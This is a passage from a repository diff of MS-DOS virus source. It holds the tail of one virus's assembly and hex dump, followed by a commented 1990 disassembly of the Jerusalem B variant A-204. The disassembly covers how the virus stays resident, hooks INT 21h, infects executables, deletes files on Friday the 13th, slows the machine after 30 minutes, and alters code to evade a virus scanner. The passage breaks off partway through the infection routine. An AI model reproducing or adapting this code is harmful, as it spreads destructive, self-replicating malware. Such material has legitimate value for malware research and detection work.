+45E3:03FE 72EB JB 03EB
+45E3:0400 050500 ADD AX,0005
+45E3:0403 2EA31100 MOV CS:[0011],AX
+45E3:0407 B90500 MOV CX,0005
+45E3:040A BA6B00 MOV DX,006B ; Cti ze souboru
+45E3:040D 8CC8 MOV AX,CS ; 5 byte (CS:6B)
+45E3:040F 8ED8 MOV DS,AX
+45E3:0411 8EC0 MOV ES,AX
+45E3:0413 B43F MOV AH,3F
+45E3:0415 CD21 INT 21
+45E3:0417 8BFA MOV DI,DX
+45E3:0419 BE0500 MOV SI,0005 ; Rozpoznavaci kod je
+45E3:041C F3 REPZ ; MsDos.
+45E3:041D A6 CMPSB +45E3:041E 7507 JNZ 0427 +45E3:0420 B43E MOV AH,3E ; Soubor je nakazen. +45E3:0422 CD21 INT 21 +45E3:0424 E9C001 JMP 05E7 +45E3:0427 B82435 MOV AX,3524 +45E3:042A CD21 INT 21 +45E3:042C 891E1B00 MOV [001B],BX +45E3:0430 8C061D00 MOV [001D],ES +45E3:0434 BA1B02 MOV DX,021B +45E3:0437 B82425 MOV AX,2524 +45E3:043A CD21 INT 21 +45E3:043C C5168000 LDS DX,[0080] +45E3:0440 33C9 XOR CX,CX +45E3:0442 B80143 MOV AX,4301 +45E3:0445 CD21 INT 21 +45E3:0447 723B JB 0484 +45E3:0449 2E8B1E7000 MOV BX,CS:[0070] +45E3:044E B43E MOV AH,3E +45E3:0450 CD21 INT 21 +45E3:0452 2EC7067000FFFF MOV Word Ptr CS:[0070],FFFF +45E3:0459 B8023D MOV AX,3D02 +45E3:045C CD21 INT 21 +45E3:045E 7224 JB 0484 +45E3:0460 2EA37000 MOV CS:[0070],AX +45E3:0464 8CC8 MOV AX,CS +45E3:0466 8ED8 MOV DS,AX +45E3:0468 8EC0 MOV ES,AX +45E3:046A 8B1E7000 MOV BX,[0070] +45E3:046E B80057 MOV AX,5700 +45E3:0471 CD21 INT 21 +45E3:0473 89167400 MOV [0074],DX +45E3:0477 890E7600 MOV [0076],CX +45E3:047B B80042 MOV AX,4200 +45E3:047E 33C9 XOR CX,CX +45E3:0480 8BD1 MOV DX,CX +45E3:0482 CD21 INT 21 +45E3:0484 723D JB 04C3 +45E3:0486 803E4E0000 CMP Byte Ptr [004E],00 +45E3:048B 7403 JZ 0490 +45E3:048D EB57 JMP 04E6 +45E3:048F 90 NOP +45E3:0490 BB0010 MOV BX,1000 +45E3:0493 B448 MOV AH,48 +45E3:0495 CD21 INT 21 +45E3:0497 730B JNB 04A4 +45E3:0499 B43E MOV AH,3E +45E3:049B 8B1E7000 MOV BX,[0070] +45E3:049F CD21 INT 21 +45E3:04A1 E94301 JMP 05E7 +45E3:04A4 FF068F00 INC Word Ptr [008F] +45E3:04A8 8EC0 MOV ES,AX +45E3:04AA 33F6 XOR SI,SI +45E3:04AC 8BFE MOV DI,SI +45E3:04AE B91007 MOV CX,0710 +45E3:04B1 F3 REPZ +45E3:04B2 A4 MOVSB +45E3:04B3 8BD7 MOV DX,DI +45E3:04B5 8B0E1100 MOV CX,[0011] +45E3:04B9 8B1E7000 MOV BX,[0070] +45E3:04BD 06 PUSH ES +45E3:04BE 1F POP DS +45E3:04BF B43F MOV AH,3F +45E3:04C1 CD21 INT 21 +45E3:04C3 721C JB 04E1 +45E3:04C5 03F9 ADD DI,CX +45E3:04C7 33C9 XOR CX,CX +45E3:04C9 8BD1 MOV DX,CX +45E3:04CB B80042 MOV AX,4200 +45E3:04CE CD21 INT 21 +45E3:04D0 BE0500 MOV SI,0005 +45E3:04D3 
B90500 MOV CX,0005 +45E3:04D6 F3 REPZ +45E3:04D7 2EA4 MOVSB CS: +45E3:04D9 8BCF MOV CX,DI +45E3:04DB 33D2 XOR DX,DX +45E3:04DD B440 MOV AH,40 +45E3:04DF CD21 INT 21 +45E3:04E1 720D JB 04F0 +45E3:04E3 E9BC00 JMP 05A2 +45E3:04E6 B91C00 MOV CX,001C +45E3:04E9 BA4F00 MOV DX,004F +45E3:04EC B43F MOV AH,3F +45E3:04EE CD21 INT 21 +45E3:04F0 724A JB 053C +45E3:04F2 C70661008419 MOV Word Ptr [0061],1984 +45E3:04F8 A15D00 MOV AX,[005D] +45E3:04FB A34500 MOV [0045],AX +45E3:04FE A15F00 MOV AX,[005F] +45E3:0501 A34300 MOV [0043],AX +45E3:0504 A16300 MOV AX,[0063] +45E3:0507 A34700 MOV [0047],AX +45E3:050A A16500 MOV AX,[0065] +45E3:050D A34900 MOV [0049],AX +45E3:0510 A15300 MOV AX,[0053] +45E3:0513 833E510000 CMP Word Ptr [0051],+00 +45E3:0518 7401 JZ 051B +45E3:051A 48 DEC AX +45E3:051B F7267800 MUL Word Ptr [0078] +45E3:051F 03065100 ADD AX,[0051] +45E3:0523 83D200 ADC DX,+00 +45E3:0526 050F00 ADD AX,000F +45E3:0529 83D200 ADC DX,+00 +45E3:052C 25F0FF AND AX,FFF0 +45E3:052F A37C00 MOV [007C],AX +45E3:0532 89167E00 MOV [007E],DX +45E3:0536 051007 ADD AX,0710 +45E3:0539 83D200 ADC DX,+00 +45E3:053C 723A JB 0578 +45E3:053E F7367800 DIV Word Ptr [0078] +45E3:0542 0BD2 OR DX,DX +45E3:0544 7401 JZ 0547 +45E3:0546 40 INC AX +45E3:0547 A35300 MOV [0053],AX +45E3:054A 89165100 MOV [0051],DX +45E3:054E A17C00 MOV AX,[007C] +45E3:0551 8B167E00 MOV DX,[007E] +45E3:0555 F7367A00 DIV Word Ptr [007A] +45E3:0559 2B065700 SUB AX,[0057] +45E3:055D A36500 MOV [0065],AX +45E3:0560 C7066300C500 MOV Word Ptr [0063],00C5 +45E3:0566 A35D00 MOV [005D],AX +45E3:0569 C7065F001007 MOV Word Ptr [005F],0710 +45E3:056F 33C9 XOR CX,CX +45E3:0571 8BD1 MOV DX,CX +45E3:0573 B80042 MOV AX,4200 +45E3:0576 CD21 INT 21 +45E3:0578 720A JB 0584 +45E3:057A B91C00 MOV CX,001C +45E3:057D BA4F00 MOV DX,004F +45E3:0580 B440 MOV AH,40 +45E3:0582 CD21 INT 21 +45E3:0584 7211 JB 0597 +45E3:0586 3BC1 CMP AX,CX +45E3:0588 7518 JNZ 05A2 +45E3:058A 8B167C00 MOV DX,[007C] +45E3:058E 8B0E7E00 MOV CX,[007E] +45E3:0592 B80042 MOV 
AX,4200 +45E3:0595 CD21 INT 21 +45E3:0597 7209 JB 05A2 +45E3:0599 33D2 XOR DX,DX +45E3:059B B91007 MOV CX,0710 +45E3:059E B440 MOV AH,40 +45E3:05A0 CD21 INT 21 +45E3:05A2 2E833E8F0000 CMP Word Ptr CS:[008F],+00 +45E3:05A8 7404 JZ 05AE +45E3:05AA B449 MOV AH,49 +45E3:05AC CD21 INT 21 +45E3:05AE 2E833E7000FF CMP Word Ptr CS:[0070],-01 +45E3:05B4 7431 JZ 05E7 +45E3:05B6 2E8B1E7000 MOV BX,CS:[0070] +45E3:05BB 2E8B167400 MOV DX,CS:[0074] +45E3:05C0 2E8B0E7600 MOV CX,CS:[0076] +45E3:05C5 B80157 MOV AX,5701 +45E3:05C8 CD21 INT 21 +45E3:05CA B43E MOV AH,3E +45E3:05CC CD21 INT 21 +45E3:05CE 2EC5168000 LDS DX,CS:[0080] +45E3:05D3 2E8B0E7200 MOV CX,CS:[0072] +45E3:05D8 B80143 MOV AX,4301 +45E3:05DB CD21 INT 21 +45E3:05DD 2EC5161B00 LDS DX,CS:[001B] +45E3:05E2 B82425 MOV AX,2524 +45E3:05E5 CD21 INT 21 +45E3:05E7 07 POP ES +45E3:05E8 1F POP DS +45E3:05E9 5F POP DI +45E3:05EA 5E POP SI +45E3:05EB 5A POP DX +45E3:05EC 59 POP CX +45E3:05ED 5B POP BX +45E3:05EE 58 POP AX +45E3:05EF 9D POPF +45E3:05F0 2EFF2E1700 JMP FAR CS:[0017] +45E3:05F0 00 00 00-00 00 00 00 00 00 00 00 ........... +45E3:0600 F2 13 50 43 54 4F 4F 4C-53 2E 45 58 45 00 22 2F r.PCTOOLS.EXE."/ +45E3:0610 01 FE 0D 00 8B 00 F0 F0-83 F2 F4 03 00 0F 00 00 .~....pp.rt..... +45E3:0620 4D FE 0D 04 00 45 43 3D-43 3A 5C 43 4F 4D 4D 41 M~...EC=C:\COMMA +45E3:0630 00 47 02 00 00 32 00 FF-FF FF FF FF FF FF FF FF .G...2.......... +45E3:0640 FF FF FF FF FF FF FF FF-FF 43 3A 5C 5A 53 53 52 .........C:\ZSSR +45E3:0650 5C 4B 41 4C 49 42 52 5C-4B 41 49 4B 49 2E 42 41 \KALIBR\KAIKI.BA +45E3:0660 54 00 6B 61 69 6B 69 0D-00 FF FF FF 00 00 00 00 T.kaiki......... +45E3:0670 4D FE 0D 00 10 M~... +45E3:0670 00 00 00-00 00 00 00 00 00 00 00 ........... +45E3:0680 E9 92 00 73 55 4D 73 44-6F 73 00 01 77 i..sUMsDos \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.j_a204.asm b/MSDOS/Virus.MSDOS.Unknown.j_a204.asm new file mode 100644 index 00000000..238195e6 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.j_a204.asm 
@@ -0,0 +1,977 @@ + Virus : Jerusalem Version B Variant A-204 +Disassembled by : Righard Zwienenberg + Steenwijklaan 302 + 2541 RT The Hague + The Netherlands + Data : +31-70-3898822, V22,V22b,HST,MNP,CM + Voive : +31-70-3675379 +FidoNet address : 2:512/2.3 + Used Software : ASMGEN, DEBUG and D86-Disassembler + Date : 20 june 1990 + +Note : All Values are hex. If a value is followd by d (e.g. 30d) it means +30 decimal. + +Note : This disassembly consists of two programs. The original program was +a dummy file (20h bytes long) containing 1Fh times 90 RET and 01h time +C3 RET. + +0100 E9 92 00 JMP 0195 ; JUMP -> 0195h + +0103 db 2A,41,2D,32,30,34,2A ; *A-204* never used + +010A dw 00 01 ; Startaddress original program +010C dw 01 56 ; Startaddress-offset original program +010E db 00 ; Trigger for destruction (delete file) + ; Always zero, but if it is Friday the 13th and the year is + ; not equal 1987 this byte is set to one +010F dw 00 00 ; Storing place for original AX (read-only word) +0111 dw 20 00 ; Length of Original Program (0020h) +0113 dw A5 FE ; Storing place for original BX of INT 08h vector +0115 dw 00 F0 ; Storing place for original ES of INT 08h vector +0117 dw 60 14 ; Storing place for original BX of INT 21h vector +0119 dw 2B 02 ; Storing place for original ES of INT 21h vector +011B dw 56 05 ; Storing place for original BX of INT 24h vector +011D dw DE 0C ; Storing place for original ES of INT 24h vector +011F dw 40 7E ; Storing place for timer for 30 minutes trigger + ; By init. set to 7E90h + + ; The following words are never used by the virus. The are used + ; by a routine starting at 0398h which is executed when INT 21h + ; is called with AH=DEh. This never happens in the code. +0121 dw 00 00 ; +0123 dw 00 00 ; +0125 dw 00 00 ; +0127 dw 00 00 ; +0129 dw 00 00 ; +012B dw 00 00 ; +012D dw 00 E8 ; +012F dw 06 EC ; + +0131 dw 91 16 ; Storing place for original ES +0133 dw 80 00 ; Storing place for BX. 
Never read again + +0135 00 00 00 80 00 + +0139 dw 91 16 ; Storing place for original ES + +013B 5C 00 + +013D dw 91 16 ; Storing place for original ES + +013F 6C 00 ; + +0141 dw 91 16 ; Temp. storing place for original ES +0143 dw 00 20 ; Temp. storing place for AX +0145 dw 0D 1F ; Temp. storing place for ES+10h +0147 dw 5F 21 ; Storing place for AX +0149 dw A1 16 ; Temp. storing place for ES+10h +014B dw 00 F0 ; Temp. storing place for AX +014D db 02 ; Temp. storing place for AL +014E db 00 ; COM/EXE indicator + ; 0 = EXE-File + ; 1 = COM-File +0151 dw 30 01 ; Temp. storing place for DX +0153 dw 23 00 ; Temp. storing place for AX + +0155 20 01 + +0157 dw 4A 00 ; Read Only!!! The code only read this word to substract it + ; from AX + +0159 D4 06 D4 06 + +015D dw 98 03 ; Temp. Storing place to store AX +015F dw 10 07 ; Probably startaddress of virus in mem +0161 dw 84 19 ; Never used!!! 1984h is stored here by the code +0163 dw C5 00 ; 00C5h is being read and put back later by the code +0165 dw 99 03 ; Temp. storing place for AX + +0167 1C 00 00 00 90 90 90 90 C3 + +0170 dw 05 00 ; Storing place for file handle (BX) +0172 dw 20 00 ; Storing place for file attributes + ; bit 0 = read only + ; bit 1 = hidden file + ; bit 2 = system file + ; bit 3 = volume label + ; bit 4 = subdirectory + ; bit 5 = archive bit + ; bit 8 = shareable (Novell Network) +0174 dw D5 14 ; Storing place for file date (DX) +0176 dw 99 83 ; Storing place for file time (CX) +0178 dw 00 02 ; 0200h=512d Used as multiplier/divider +017A dw 10 00 ; 0001h= 1d Used as multiplier/divider +017C dw 20 3E ; Temp. storing place for AX +017E dw 00 00 ; Temp. 
storing place for DX +0180 dw B9 42 ; Storing place for DX of ASCIZ-Filename +0182 dw 1A 9B ; Storing place for DS of ASCIZ-Filename + +0184 db 43,4F,4D,4D,41,4E,44,2E,43,4F,4D ; COMMAND.COM + ; May not become infected + +018F dw 01 00 ; Storing place for variable-result of free-memory-scan + ; 0000h : not enough memory available + ; 0001h : enough memory available + +0191 00 00 00 00 + +0195 FC CLD ; Clear Direct +0196 B4 E0 MOV AH,0E0 ; This is the check if the +0198 CD 21 INT 021 ; virus is already active + ; in memory. INT 21h with + ; AH=E0h will return AX=0300h + ; if the virus is active. +019A 80 FC E0 CMP AH,0E0 ; AH>=E0h? +019D 73 16 JAE 01B5 ; Yes: -> 01B5h +019F 80 FC 03 CMP AH,3 ; AH<-03h? +01A2 72 11 JB 01B5 ; Yes: -> 01B5h + ; INT 21h with AH= + ; DDh,DEh,E0h + ; are self-defined. + + ; SetUp for + ; Executing original program + ; We come here if an infected + ; program is executed and the + ; virus is already active in + ; memory. +01A4 B4 DD MOV AH,0DD ; +01A6 BF 00 01 MOV DI,0100 ; Destination Index = 0100h +01A9 BE 10 07 MOV SI,0710 ; Source Index = 0710h +01AC 03 F7 ADD SI,DI ; Source Index:= 0810h + ; At this place the original + ; Program is located +01AE 2E 8B 8D 11 00 CS MOV CX,W[DI+011]; CX=20h (length original + ; Program) +01B3 CD 21 INT 021 ; + + ; Here we come when the virus + ; is not yet in memory +01B5 8C C8 MOV AX,CS ; AX=Code Segment +01B7 05 10 00 ADD AX,010 ; AX:=AX+10h +01BA 8E D0 MOV SS,AX ; Stack Segment:=AX +01BC BC 00 07 MOV SP,0700 ; StackPointer = 0700h +01BF 50 PUSH AX ; Store AX +01C0 B8 C5 00 MOV AX,0C5 ; AX = C5h +01C3 50 PUSH AX ; Store AX +01C4 CB RETF ; -> C5h + +01C5 FC CLD ; Clear Direct +01C6 06 PUSH ES ; Store ES +01C7 2E 8C 06 31 00 CS MOV W[031],ES ; Store ES +01CC 2E 8C 06 39 00 CS MOV W[039],ES ; in storage places +01D1 2E 8C 06 3D 00 CS MOV W[03D],ES ; +01D6 2E 8C 06 41 00 CS MOV W[041],ES ; +01DB 8C C0 MOV AX,ES ; AX=ES +01DD 05 10 00 ADD AX,010 ; AX=AX+10h +01E0 2E 01 06 49 00 CS ADD W[049],AX ; Add AX 
(ES+10h) to 0149h +01E5 2E 01 06 45 00 CS ADD W[045],AX ; and 0145h +01EA B4 E0 MOV AH,0E0 ; AH=E0h (Self defined) +01EC CD 21 INT 021 ; CALL INT 21h + +01EE 80 FC E0 CMP AH,0E0 ; AH>=0Eh? +01F1 73 13 JAE 0206 ; Yes: -> 0206 +01F3 80 FC 03 CMP AH,3 ; AH=03h? Must be if the + ; viruscode is in memory + ; and interrupt 21h is called + ; with AH=E0h. + +01F6 07 POP ES ; Restore original ES +01F7 2E 8E 16 45 00 CS MOV SS,W[045] ; SS=ES+10h +01FC 2E 8B 26 43 00 CS MOV SP,W[043] ; +0201 2E FF 2E 47 00 CS JMP D[047] ; + +0206 33 C0 XOR AX,AX ; AX=0000h +0208 8E C0 MOV ES,AX ; ES=0000h +020A 26 A1 FC 03 ES MOV AX,W[03FC] + + ; Here the A-204 variant + ; differs for the first + ; time from the original + ; Jerusalem Version B virus. +020E 26 A0 FE 03 ES MOV AL,B[03FE] ; These two line have been +0212 2E A3 4B 00 CS MOV W[04B],AX ; changed in order + ; to avoid being + ; detected by ViruScan from + ; John McAfee. + +0216 2E A2 4D 00 CS MOV B[04D],AL +021A 26 C7 06 FC 03 F3 A5 ES MOV W[03FC],0A5F3 +0221 26 C6 06 FE 03 CB ES MOV B[03FE],0CB +0227 58 POP AX +0228 05 10 00 ADD AX,010 +022B 8E C0 MOV ES,AX +022D 0E PUSH CS ; Store CS +022E 1F POP DS ; DS=CS +022F B9 10 07 MOV CX,0710 ; CX=0710h +0232 D1 E9 SHR CX,1 ; CX >> 1 (CX:=0308h) +0234 33 F6 XOR SI,SI ; SI=0000h +0236 8B FE MOV DI,SI ; DI=0000h +0238 06 PUSH ES ; Store ES +0239 B8 42 01 MOV AX,0142 ; AX=0142h +023C 50 PUSH AX ; Store AX +023D EA FC 03 00 00 JMP 0:03FC + +0242 8C C8 MOV AX,CS ; AX=CS +0244 8E D0 MOV SS,AX ; SS=CS +0246 BC 00 07 MOV SP,0700 ; SP=0700h +0249 33 C0 XOR AX,AX ; AX=0000h +024B 8E D8 MOV DS,AX ; DS=0000h +024D 2E A1 4B 00 CS MOV AX,W[04B] ; Restore AX +0251 A3 FC 03 MOV W[03FC],AX ; Store AX +0254 2E A0 4D 00 CS MOV AL,B[04D] ; Restore AL +0258 A2 FE 03 MOV B[03FE],AL ; Store AL +025B 8B DC MOV BX,SP ; BX=SP +025D B1 04 MOV CL,4 ; CL=04h +025F D3 EB SHR BX,CL ; BX >> 4 +0261 83 C3 10 ADD BX,010 ; BX=BX+10h +0264 2E 89 1E 33 00 CS MOV W[033],BX ; Store BX. 
Why I don't know, + ; the storing place is never + ; read again +0269 B4 4A MOV AH,04A ; +026B 2E 8E 06 31 00 CS MOV ES,W[031] ; Restore ES +0270 CD 21 INT 021 ; Adjust Memory Block Size + ; (SETBLOCK) + +0272 B8 21 35 MOV AX,03521 ; Get original INT 21h +0275 CD 21 INT 021 ; vector + +0277 2E 89 1E 17 00 CS MOV W[017],BX ; Store BX and ES of INT 21h +027C 2E 8C 06 19 00 CS MOV W[019],ES ; vector +0281 0E PUSH CS ; Store CS +0282 1F POP DS ; DS=CS +0283 BA 5B 02 MOV DX,025B ; DX=025Bh +0286 B8 21 25 MOV AX,02521 ; Set new INT 21h +0289 CD 21 INT 021 ; vector on DS:025Bh + +028B 8E 06 31 00 MOV ES,W[031] ; Restore original ES +028F 26 8E 06 2C 00 ES MOV ES,W[02C] ; +0294 33 FF XOR DI,DI ; DI=0000h +0296 B9 FF 7F MOV CX,07FFF ; CX=7FFFh +0299 32 C0 XOR AL,AL ; AL=0000h +029B F2 AE REPNE SCASB ; +029D 26 38 05 ES CMP B[DI],AL ; +02A0 E0 F9 LOOPNE 029B ; No Flags: DEC CX -> 02A2h + ; IF CX<>0 and not equal + ; -> 029B +02A2 8B D7 MOV DX,DI ; DX=DI +02A4 83 C2 03 ADD DX,3 ; DX=DX+03h +02A7 B8 00 4B MOV AX,04B00 ; AX=4B00h +02AA 06 PUSH ES ; Store ES +02AB 1F POP DS ; Restore DS (DS:=ES) +02AC 0E PUSH CS ; Store CS +02AD 07 POP ES ; Restore ES (ES:=CS) +02AE BB 35 00 MOV BX,035 ; BX=35h +02B1 1E PUSH DS ; Store Registers +02B2 06 PUSH ES +02B3 50 PUSH AX +02B4 53 PUSH BX +02B5 51 PUSH CX +02B6 52 PUSH DX + +02B7 B4 2A MOV AH,02A ; Get Current Date +02B9 CD 21 INT 021 ; DL=day + ; DH=month + ; CX=year + ; AL=Day of the week + +02BB 2E C6 06 0E 00 00 CS MOV B[0E],0 ; Set Trigger for deleting + ; infected files to 00h +02C1 81 F9 C3 07 CMP CX,07C3 ; Is year 1987 ? +02C5 74 30 JE 02F7 ; Yes: -> 02F7h +02C7 3C 05 CMP AL,5 ; Is it Friday ? +02C9 75 0D JNE 02D8 ; No: -> 02D8h +02CB 80 FA 0D CMP DL,0D ; Is it 13th ? 
+02CE 75 08 JNE 02D8 ; No: -> 02D8h + ; Yes: it is Friday + ; the 13th and the + ; year is not equal 1987 +02D0 2E FE 06 0E 00 CS INC B[0E] ; Set Trigger for deleting + ; infected files to 01h +02D5 EB 20 JMP 02F7 ; JUMP -> 02F7h + +02D7 90 NOP + +02D8 B8 08 35 MOV AX,03508 ; Get original INT 8h +02DB CD 21 INT 021 ; vector + +02DD 2E 89 1E 13 00 CS MOV W[013],BX ; Store original BX +02E2 2E 8C 06 15 00 CS MOV W[015],ES ; and ES of INT 08h vector +02E7 0E PUSH CS +02E8 1F POP DS +02E9 C7 06 1F 00 90 7E MOV W[01F],07E90 ; Store 30d minutes into + ; timer interrupt. This + ; value is decreased by + ; one 18.2 times per second +02EF B8 08 25 MOV AX,02508 ; Set new INT 8h vector +02F2 BA 1E 02 MOV DX,021E ; to DS:021Eh +02F5 CD 21 INT 021 ; + +02F7 5A POP DX ; Restore Registers +02F8 59 POP CX +02F9 5B POP BX +02FA 58 POP AX +02FB 07 POP ES +02FC 1F POP DS +02FD 9C PUSHF ; Store Flags +02FE 2E FF 1E 17 00 CS CALL D[017] ; Call original INT 21h + ; address + +0303 1E PUSH DS ; Restore DS +0304 07 POP ES ; Store ES +0305 B4 49 MOV AH,049 ; Free Memory +0307 CD 21 INT 021 ; + +0309 B4 4D MOV AH,04D ; Get ExitCode of +030B CD 21 INT 021 ; SubProgram (WAIT) + ; Stored in AL + +030D B4 31 MOV AH,031 ; AX=31[AL]h +030F BA 00 06 MOV DX,0600 ; DX=600h +0312 B1 04 MOV CL,4 ; CL=04h +0314 D3 EA SHR DX,CL ; DX >> 4 (DX=60H) +0316 83 C2 10 ADD DX,010 ; DX=DX+10h (DX=70h) + ; Program Size in Paragraphs + ; is 70h Bytes +0319 CD 21 INT 021 ; Terminate but Stay Resident + +031B 32 C0 XOR AL,AL ; Clear AL +031D CF IRET ; Interrupt Return + + ; 031Eh is the new INT 08h + ; vector. This routine is + ; called 18.2 times per + ; second +031E 2E 83 3E 1F 00 02 CS CMP W[01F],2 ; Timer decreased til 02h? 
+0324 75 17 JNE 033D ; No: -> 033D + + ; Yes: now 32 minutes are + ; passed since infection +0326 50 PUSH AX ; Store Registers +0327 53 PUSH BX +0328 51 PUSH CX +0329 52 PUSH DX +032A 55 PUSH BP + +032B B8 02 06 MOV AX,0602 ; Scroll box with coordinates +032E B7 87 MOV BH,087 ; (5h,5h),(10h,10h) two +0330 B9 05 05 MOV CX,0505 ; lines upwards +0333 BA 10 10 MOV DX,01010 ; +0336 CD 10 INT 010 ; + +0338 5D POP BP ; Restore Registers +0339 5A POP DX +033A 59 POP CX +033B 5B POP BX +033C 58 POP AX +033D 2E FF 0E 1F 00 CS DEC W[01F] ; Decrease Timer-Trigger + ; This now becomes 01h +0342 75 12 JNE 0356 ; If 0: -> 0356h +0344 2E C7 06 1F 00 01 00 CS MOV W[01F],1 ; Timer-Trigger set to 01h +034B 50 PUSH AX ; Store AX +034C 51 PUSH CX ; Store CX +034D 56 PUSH SI ; Store SI +034E B9 01 40 MOV CX,04001 ; CX=4001h +0351 F3 AC REP LODSB ; Load byte [SI] into AL and + ; advance SI, done CX times. + ; This is the routine which + ; decreases the speed of the + ; machine til 1/5th of the + ; original. 32 minutes after + ; infection this routine is + ; executes 18.2 times a second +0353 5E POP SI ; Restore SI +0354 59 POP CX ; Restore CX +0355 58 POP AX ; Restore AX +0356 2E FF 2E 13 00 CS JMP D[013] ; Jump to original INT 08h + ; address + + ; Here we come if INT 21h is + ; called +035B 9C PUSHF ; Store Flags +035C 80 FC E0 CMP AH,0E0 ; AH=0Eh ? +035F 75 05 JNE 0366 ; No: -> 0366h +0361 B8 00 03 MOV AX,0300 ; AX=0300h +0364 9D POPF ; Restore Flags +0365 CF IRET ; Interrupt Return + +0366 80 FC DD CMP AH,0DD ; AH=DDh? +0369 74 13 JE 037E ; Yes: -> 037Eh +036B 80 FC DE CMP AH,0DE ; AH=DEh? +036E 74 28 JE 0398 ; Yes: -> 0398h + ; INT 21h is never called + ; with AH=DEh. So the routine + ; at 0398h is never used + ; (seems) + +0370 3D 00 4B CMP AX,04B00 ; Load & Execute ? 
+0373 75 03 JNE 0378 ; No: -> 0378h +0375 E9 B4 00 JMP 042C ; Yes: -> 042Ch +0378 9D POPF ; Restore Flags +0379 2E FF 2E 17 00 CS JMP D[017] ; Jmp to original + ; INT 21h address + + ; Execute original program +037E 58 POP AX +037F 58 POP AX ; Restore AX +0380 B8 00 01 MOV AX,0100 ; AX=0100h +0383 2E A3 0A 00 CS MOV W[0A],AX ; Store AX +0387 58 POP AX ; Restore AX +0388 2E A3 0C 00 CS MOV W[0C],AX ; Store AX +038C F3 A4 REP MOVSB ; +038E 9D POPF ; Restore Flags +038F 2E A1 0F 00 CS MOV AX,W[0F] ; AX=0000h +0393 2E FF 2E 0A 00 CS JMP D[0A] ; JUMP -> CS:0100h + ; This executes the original + ; program + + + ; This routine is called + ; when INT 21h with AH=DEh + ; is called which never + ; happens in the code. I + ; have to investigate it + ; a bit more. Til then + ; it remains without comments. +0398 83 C4 06 ADD SP,6 +039B 9D POPF +039C 8C C8 MOV AX,CS +039E 8E D0 MOV SS,AX +03A0 BC 10 07 MOV SP,0710 +03A3 06 PUSH ES +03A4 06 PUSH ES +03A5 33 FF XOR DI,DI +03A7 0E PUSH CS +03A8 07 POP ES +03A9 B9 10 00 MOV CX,010 +03AC 8B F3 MOV SI,BX +03AE BF 21 00 MOV DI,021 +03B1 F3 A4 REP MOVSB +03B3 8C D8 MOV AX,DS +03B5 8E C0 MOV ES,AX +03B7 2E F7 26 7A 00 CS MUL W[07A] +03BC 2E 03 06 2B 00 CS ADD AX,W[02B] +03C1 83 D2 00 ADC DX,0 +03C4 2E F7 36 7A 00 CS DIV W[07A] +03C9 8E D8 MOV DS,AX +03CB 8B F2 MOV SI,DX +03CD 8B FA MOV DI,DX +03CF 8C C5 MOV BP,ES +03D1 2E 8B 1E 2F 00 CS MOV BX,W[02F] +03D6 0B DB OR BX,BX +03D8 74 13 JE 03ED +03DA B9 00 80 MOV CX,08000 +03DD F3 A5 REP MOVSW +03DF 05 00 10 ADD AX,01000 +03E2 81 C5 00 10 ADD BP,01000 +03E6 8E D8 MOV DS,AX +03E8 8E C5 MOV ES,BP +03EA 4B DEC BX +03EB 75 ED JNE 03DA +03ED 2E 8B 0E 2D 00 CS MOV CX,W[02D] +03F2 F3 A4 REP MOVSB +03F4 58 POP AX +03F5 50 PUSH AX +03F6 05 10 00 ADD AX,010 +03F9 2E 01 06 29 00 CS ADD W[029],AX +03FE 2E 01 06 25 00 CS ADD W[025],AX +0403 2E A1 21 00 CS MOV AX,W[021] +0407 1F POP DS +0408 07 POP ES +0409 2E 8E 16 29 00 CS MOV SS,W[029] +040E 2E 8B 26 27 00 CS MOV SP,W[027] +0413 2E FF 2E 23 00 CS JMP 
D[023] + + ; We come here if B[0Eh]=1, + ; which means Friday 13th, + ; year<>1987. This routine + ; deletes the loaded file. +0418 33 C9 XOR CX,CX ; Clear all bits of the File + ; Attribute +041A B8 01 43 MOV AX,04301 ; +041D CD 21 INT 021 ; Put File Atributes + +041F B4 41 MOV AH,041 ; +0421 CD 21 INT 021 ; Delete a File (Unlink) + +0423 B8 00 4B MOV AX,04B00 + +0426 9D POPF ; Get Flags +0427 2E FF 2E 17 00 CS JMP D[017] + + ; We come here each time a + ; file is loaded with the + ; load and execute call + ; (INT 21h, AX=4B00h) +042C 2E 80 3E 0E 00 01 CS CMP B[0E],1 ; Is it Friday 13th, + ; year<>1987? +0432 74 E4 JE 0418 ; Yes: -> 0418h +0434 2E C7 06 70 00 FF FF CS MOV W[070],-1 ; File Handle -1 ??? +043B 2E C7 06 8F 00 00 00 CS MOV W[08F],0 ; Clear Memory-Available + ; variable +0442 2E 89 16 80 00 CS MOV W[080],DX ; DS:DX -> ASCIZ Filename, +0447 2E 8C 1E 82 00 CS MOV W[082],DS ; Store DX and DS +044C 50 PUSH AX +044D 53 PUSH BX +044E 51 PUSH CX +044F 52 PUSH DX +0450 56 PUSH SI +0451 57 PUSH DI +0452 1E PUSH DS +0453 06 PUSH ES +0454 FC CLD +0455 8B FA MOV DI,DX ; +0457 32 D2 XOR DL,DL ; DL=00h : Take Default Drive +0459 80 7D 01 3A CMP B[DI+1],03A ; ':' at 2nd place in ASCIZ- + ; filename +045D 75 05 JNE 0464 ; No: -> 0464h +045F 8A 15 MOV DL,B[DI] ; Get Drive Letter +0461 80 E2 1F AND DL,01F ; Get Drive Code + ; 0 = Default + ; 1 = A + ; 2 = B, etc. +0464 B4 36 MOV AH,036 ; +0466 CD 21 INT 021 ; Get disk space + ; BX=# of available clusters + ; CX=Bytes per sector + ; DX=Total clusters + +0468 3D FF FF CMP AX,-1 ; No Sectors Free? +046B 75 03 JNE 0470 ; No: -> 0470h +046D E9 77 02 JMP 06E7 ; Yes: -> 06E7h + + +0470 F7 E3 MUL BX ; Calculate Free Space +0472 F7 E1 MUL CX ; +0474 0B D2 OR DX,DX ; +0476 75 05 JNE 047D ; +0478 3D 10 07 CMP AX,0710 ; 1808 Bytes Free? 
